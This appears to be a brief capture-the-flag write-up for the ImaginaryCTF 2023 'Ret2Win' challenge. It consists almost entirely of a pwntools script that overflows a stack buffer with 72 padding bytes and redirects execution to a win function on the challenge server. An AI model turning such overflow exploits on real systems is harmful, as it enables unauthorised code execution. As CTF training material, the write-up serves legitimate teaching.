🌟Ret2Win - ImaginaryCTF 2023
Source
Script
from pwn import *
r = remote("ret2win.chal.imaginaryctf.org", 1337)
# r = process("./vuln")
# gdb.attach(r, '''b*main+35\nc''')
payload = b"a" * 72 + p64(0x000000000040101a) + p64(0x000000000040117a)
r.sendline(payload)
r.interactive()

Last updated